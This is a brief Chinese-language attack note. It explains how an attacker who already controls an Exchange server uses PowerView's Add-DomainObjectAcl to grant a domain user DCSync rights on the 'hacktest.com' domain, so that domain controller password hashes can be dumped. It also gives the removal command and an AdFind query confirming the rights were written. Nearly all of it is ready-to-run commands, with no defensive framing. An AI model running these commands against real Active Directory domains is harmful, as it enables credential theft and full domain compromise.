已有Exchange server权限,通过给指定用户writeACL 然后Dcsync导出域控哈希
脚本地址如下
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
命令行:
#Empire下的powerview.ps1脚本
Import-Module .\powerview.ps1;
Add-DomainObjectAcl -TargetIdentity 'DC=hacktest,DC=com' -PrincipalIde 域用户 -Rights DCSync -Verbose
#移除指定用户的dcsync权限
Remove-DomainObjectAcl -TargetIdentity 'DC= hacktest,DC=com' -PrincipalIde 域用户 -Rights DCSync -Verbose
通过Adfind看是否已经写入aaa用户成功
AdFind.exe -s subtree -b "DC=hacktest,DC=com" nTSecurityDescriptor -sddl -sddlfilter ;;;"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2";; -recmute -resolvesids